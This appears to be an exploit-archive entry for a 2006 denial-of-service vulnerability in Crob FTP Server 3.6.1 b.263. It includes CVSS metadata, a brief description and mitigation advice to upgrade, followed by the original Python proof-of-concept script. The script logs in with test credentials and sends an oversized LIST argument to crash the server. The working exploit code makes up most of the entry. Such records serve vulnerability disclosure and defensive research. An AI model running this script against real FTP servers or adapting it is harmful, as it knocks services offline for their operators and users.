Crob FTP Server 3.6.1 b.263 LIST, NLST and NLST -al Denial of Service

vendor:

Crob FTP Server

by:

shinnai

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Crob FTP Server

Affected Version From: 3.6.1 b.263

Affected Version To: 3.6.1 b.263

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Crob FTP Server 3.6.1 b.263 LIST, NLST and NLST -al Denial of Service

A denial of service vulnerability exists in Crob FTP Server 3.6.1 b.263. By sending a specially crafted LIST, NLST and NLST -al command with an overly long string, a remote attacker can cause the server to crash.

Mitigation:

Upgrade to the latest version of Crob FTP Server

Source

Exploit-DB raw data:

import sys,os,string
import socket
import struct
import time

print "-----------------------------------------------------------------------"
print "# Crob FTP Server 3.6.1 b.263 LIST, NLST and NLST -al Denial of Service"
print "# url: http://www.crob.net/en/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# and, always, special thanks to rgod"
print "-----------------------------------------------------------------------"


buffer = "?A" * 9000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
       conn = s.connect(("127.0.0.1",21))
except:
       print "- Unable to connect. exiting."

d = s.recv(1024)
time.sleep(1)
s.send('USER %s\r\n' % "test")
time.sleep(1)
s.send('PASS %s\r\n' % "test")
time.sleep(1)
s.send('LIST %s\r\n' % buffer)
time.sleep(1)
s.send('HELP %s\r\n')

# milw0rm.com [2006-12-13]